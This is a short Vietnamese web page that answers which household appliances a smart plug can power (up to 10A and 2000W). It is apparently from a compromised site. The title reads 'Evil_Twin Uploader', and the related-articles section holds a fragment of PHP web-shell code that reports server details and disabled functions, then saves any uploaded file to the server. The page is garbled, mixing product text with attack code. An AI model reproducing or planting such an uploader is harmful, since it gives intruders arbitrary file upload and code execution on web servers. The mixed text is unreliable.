Evil_Twin Uploader

Bạn có thể sử dụng ổ cắm thông minh cho những loại thiết bị gia dụng nào?

Ổ cắm thông minh có dòng điện tối đa là 10A, công suất tối đa là 2000W, bất kỳ thiết bị gia dụng nào có công suất thấp hơn 2000W và có thể tắt trực tiếp.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial